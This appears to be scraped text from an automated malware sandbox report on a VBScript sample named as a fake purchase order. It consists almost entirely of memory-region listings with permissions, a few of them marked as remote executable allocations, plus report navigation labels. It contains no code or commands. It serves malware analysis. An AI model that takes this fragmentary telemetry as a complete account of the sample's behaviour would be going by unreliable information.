24975000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

2E9F000

unkown

page read and write

1F5000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

238AE000

stack

page read and write

1F4000

heap

page read and write

30D2000

trusted library allocation

page read and write

1F4000

heap

page read and write

23911000

trusted library allocation

page read and write

238E2000

trusted library allocation

page read and write

1F4000

heap

page read and write

1D6C5651000

trusted library allocation

page read and write

1D6C3BD8000

trusted library allocation

page read and write

1F4000

heap

page read and write

25EF0000

trusted library allocation

page read and write

2A4C830F000

heap

page read and write

1F4000

heap

page read and write

6C0000

direct allocation

page read and write

1F4000

heap

page read and write

25EE0000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

267D7000

trusted library allocation

page read and write

DB000

trusted library allocation

page execute and read and write

2A4C8460000

heap

page read and write

1F4000

heap

page read and write

313C000

heap

page read and write

23AE3000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

1D6C1DB5000

heap

page read and write

7FF849020000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

1F4000

heap

page read and write

84C0000

trusted library allocation

page execute and read and write

1F4000

heap

page read and write

25EE0000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F0000

heap

page read and write

1D6DBBD0000

heap

page execute and read and write

BAE46FB000

stack

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

25EF0000

trusted library allocation

page read and write

1F4000

heap

page read and write

30B0000

trusted library allocation

page read and write

1F4000

heap

page read and write

7FF848EDC000

trusted library allocation

page execute and read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

25EE0000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

30F0000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

26830000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

597000

heap

page read and write

25ED0000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

1D6C1B6B000

heap

page read and write

1F4000

heap

page read and write

25F40000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

26830000

trusted library allocation

page read and write

1D6DBB79000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

7920000

trusted library allocation

page read and write

1F5000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

77EE000

stack

page read and write

23959000

trusted library allocation

page read and write

25F40000

trusted library allocation

page read and write

8970000

direct allocation

page read and write

1F4000

heap

page read and write

780000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1D6C5273000

trusted library allocation

page read and write

1F4000

heap

page read and write

4B4C000

trusted library allocation

page read and write

4AAE000

stack

page read and write

25F40000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

25EE0000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

25EF0000

trusted library allocation

page read and write

1F5000

heap

page read and write

25EE7000

trusted library allocation

page read and write

26820000

trusted library allocation

page read and write

1D6C1B10000

heap

page read and write

1F4000

heap

page read and write

1D6DBC50000

heap

page execute and read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

25EE0000

trusted library allocation

page read and write

238F0000

trusted library allocation

page read and write

7890000

trusted library allocation

page read and write

1F4000

heap

page read and write

2399F000

trusted library allocation

page read and write

1F4000

heap

page read and write

7005000

heap

page execute and read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

576000

heap

page read and write

1F5000

heap

page read and write

84D0000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1D6C4FA1000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

5C8000

heap

page read and write

BAE3EFE000

stack

page read and write

7FF848E40000

trusted library allocation

page read and write

7040000

direct allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

C6000

trusted library allocation

page execute and read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

25F40000

trusted library allocation

page read and write

8410000

heap

page read and write

1F4000

heap

page read and write

25EE0000

trusted library allocation

page read and write

1F4000

heap

page read and write

3080000

trusted library section

page read and write

86D7000

heap

page read and write

5B0000

heap

page read and write

25ECE000

stack

page read and write

25EE0000

trusted library allocation

page read and write

23946000

trusted library allocation

page read and write

704D4D000

stack

page read and write

1F5000

heap

page read and write

1F4000

heap

page read and write

798B000

stack

page read and write

237C0000

heap

page read and write

86E3000

heap

page read and write

26860000

trusted library allocation

page read and write

25EE0000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

9294000

direct allocation

page execute and read and write

1F4000

heap

page read and write

25EE0000

trusted library allocation

page read and write

25B6E000

heap

page read and write

710000

heap

page read and write

25EE3000

trusted library allocation

page read and write

2A4C8324000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

25ED0000

trusted library allocation

page read and write

1F5000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

2A4C82EF000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

1F5000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

25B10000

heap

page read and write

1F4000

heap

page read and write

2CC0000

heap

page read and write

1F4000

heap

page read and write

703CFC000

stack

page read and write

730000

direct allocation

page read and write

1F4000

heap

page read and write

1D6C3898000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

2CB8000

stack

page read and write

7FF848FE0000

trusted library allocation

page execute and read and write

1F4000

heap

page read and write

BAE44FE000

stack

page read and write

1F4000

heap

page read and write

1D6C1D60000

heap

page readonly

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

26820000

trusted library allocation

page read and write

1F4000

heap

page read and write

25EE0000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

86A1000

heap

page read and write

6A0000

direct allocation

page read and write

2F5F000

heap

page read and write

25EE1000

trusted library allocation

page read and write

1F4000

heap

page read and write

77AE000

stack

page read and write

495F000

stack

page read and write

2A4C855A000

heap

page read and write

238B0000

trusted library allocation

page read and write

1F4000

heap

page read and write

7000000

heap

page execute and read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

267CE000

stack

page read and write

1F5000

heap

page read and write

782E000

stack

page read and write

2B3E000

unkown

page read and write

1F5000

heap

page read and write

1F4000

heap

page read and write

30AD000

trusted library allocation

page execute and read and write

5054000

remote allocation

page execute and read and write

1F5000

heap

page read and write

25BD0000

heap

page read and write

7930000

trusted library allocation

page read and write

1F4000

heap

page read and write

83CD000

stack

page read and write

7039BE000

stack

page read and write

1F4000

heap

page read and write

1D6C35D0000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

25F70000

trusted library allocation

page read and write

1F5000

heap

page read and write

2A4C8317000

heap

page read and write

25EE0000

trusted library allocation

page read and write

1F4000

heap

page read and write

3C54000

remote allocation

page execute and read and write

25F00000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

23900000

heap

page execute and read and write

26830000

trusted library allocation

page read and write

7FF8490B0000

trusted library allocation

page read and write

1F4000

heap

page read and write

9C94000

direct allocation

page execute and read and write

1D6C1B15000

heap

page read and write

7080000

direct allocation

page read and write

25EE0000

trusted library allocation

page read and write

1F4000

heap

page read and write

4978000

trusted library allocation

page read and write

1F4000

heap

page read and write

2A4C82BD000

heap

page read and write

25EF0000

trusted library allocation

page read and write

1F4000

heap

page read and write

2A4C8440000

heap

page read and write

24AA3000

trusted library allocation

page read and write

1F4000

heap

page read and write

25AA0000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

25F30000

trusted library allocation

page read and write

25910000

trusted library allocation

page read and write

1D6C1D50000

trusted library allocation

page read and write

1F4000

heap

page read and write

25EE0000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1D6C416E000

trusted library allocation

page read and write

8960000

direct allocation

page read and write

703C7E000

stack

page read and write

237D8000

trusted library allocation

page read and write

25F00000

trusted library allocation

page read and write

23AF0000

trusted library allocation

page read and write

770000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

25EF0000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

25EE0000

trusted library allocation

page read and write

1D6C3B9C000

trusted library allocation

page read and write

7FF849040000

trusted library allocation

page read and write

1F4000

heap

page read and write

25EF0000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

267F0000

trusted library allocation

page read and write

25F30000

trusted library allocation

page execute and read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

7760000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1D6DBD80000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

26830000

trusted library allocation

page read and write

25F30000

trusted library allocation

page read and write

1D6DBD84000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

25F00000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

25F40000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

7FF849130000

trusted library allocation

page read and write

1F4000

heap

page read and write

690000

direct allocation

page read and write

8420000

trusted library allocation

page execute and read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

1F4000

heap

page read and write

25EE0000

trusted library allocation

page read and write

1F4000

heap

page read and write

25EF0000

trusted library allocation

page read and write

1F4000

heap

page read and write

25EE0000

trusted library allocation

page read and write

7041FE000

stack

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

2A4C830F000

heap

page read and write

1F4000

heap

page read and write

2A4C82E1000

heap

page read and write

25A9C000

stack

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

86D3000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

25E4E000

stack

page read and write

1F4000

heap

page read and write

98142FD000

stack

page read and write

7740000

trusted library allocation

page read and write

23B1F000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

1F4000

heap

page read and write

1D6C5665000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

8360000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

703F77000

stack

page read and write

1F5000

heap

page read and write

1F4000

heap

page read and write

2A4C830F000

heap

page read and write

26830000

trusted library allocation

page read and write

BAE40FF000

stack

page read and write

1F4000

heap

page read and write

25F20000

trusted library allocation

page read and write

1F4000

heap

page read and write

26820000

trusted library allocation

page read and write

1D6D3959000

trusted library allocation

page read and write

26830000

trusted library allocation

page read and write

1F4000

heap

page read and write

BAE45FE000

stack

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

1F5000

heap

page read and write

1D6DBDDC000

heap

page read and write

7870000

trusted library allocation

page read and write

2F7F000

heap

page read and write

8950000

trusted library allocation

page execute and read and write

85FB000

stack

page read and write

2A4C82CE000

heap

page read and write

1F5000

heap

page read and write

2F68000

heap

page read and write

25ED0000

trusted library allocation

page read and write

1F5000

heap

page read and write

5B6000

heap

page read and write

25B17000

heap

page read and write

1F4000

heap

page read and write

718B000

stack

page read and write

2368A000

stack

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

8317000

stack

page read and write

2A4C855E000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

703D7E000

stack

page read and write

2A4C8558000

heap

page read and write

7750000

trusted library allocation

page execute and read and write

78E000

stack

page read and write

1F5000

heap

page read and write

25920000

heap

page read and write

1D6C1B65000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

25EE0000

trusted library allocation

page read and write

25EE0000

trusted library allocation

page read and write

25EF0000

trusted library allocation

page read and write

525E000

trusted library allocation

page read and write

30B9000

trusted library allocation

page read and write

76D0000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

25F40000

trusted library allocation

page read and write

2B50000

heap

page read and write

2A4C82DC000

heap

page read and write

1F4000

heap

page read and write

8980000

direct allocation

page read and write

238D1000

trusted library allocation

page read and write

1F4000

heap

page read and write

1D6DBBA8000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

233CE000

stack

page read and write

7680000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

25F40000

trusted library allocation

page read and write

BAE3CFA000

stack

page read and write

25F30000

trusted library allocation

page read and write

1F4000

heap

page read and write

239A8000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

30A3000

trusted library allocation

page execute and read and write

234AF000

stack

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

1F4000

heap

page read and write

25EF0000

trusted library allocation

page read and write

1F4000

heap

page read and write

2334D000

stack

page read and write

25B00000

heap

page read and write

1F5000

heap

page read and write

1F4000

heap

page read and write

2EDD000

heap

page read and write

1F4000

heap

page read and write

7854000

remote allocation

page execute and read and write

1F4000

heap

page read and write

2EA0000

heap

page read and write

1F4000

heap

page read and write

1F5000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

25F30000

trusted library allocation

page read and write

1F5000

heap

page read and write

1F4000

heap

page read and write

CA000

trusted library allocation

page execute and read and write

25AF8000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

23B30000

trusted library allocation

page read and write

1F5000

heap

page read and write

1F5000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

25ED0000

trusted library allocation

page read and write

1F4000

heap

page read and write

7FF849070000

trusted library allocation

page read and write

25F00000

trusted library allocation

page read and write

1F5000

heap

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

7FF848F40000

trusted library allocation

page execute and read and write

25EF0000

trusted library allocation

page read and write

49CC000

stack

page read and write

26820000

trusted library allocation

page read and write

1F4000

heap

page read and write

1F4000

heap

page read and write

25EE0000

trusted library allocation

page read and write

267E0000

trusted library allocation

page read and write

25EF0000

trusted library allocation

page read and write

1D6DBBD7000

heap

page execute and read and write

1F5000

heap

page read and write

1F4000

heap

page read and write

There are 1667 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
Texas_Tool_Purchase_Order#T18834-1.vbs

Files

Processes

URLs

Domains

IPs

Registry

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC ReportTexas_Tool_Purchase_Order#T18834-1.vbs

Files

Processes

URLs

Domains

IPs

Registry

Memdumps

IOC Report
Texas_Tool_Purchase_Order#T18834-1.vbs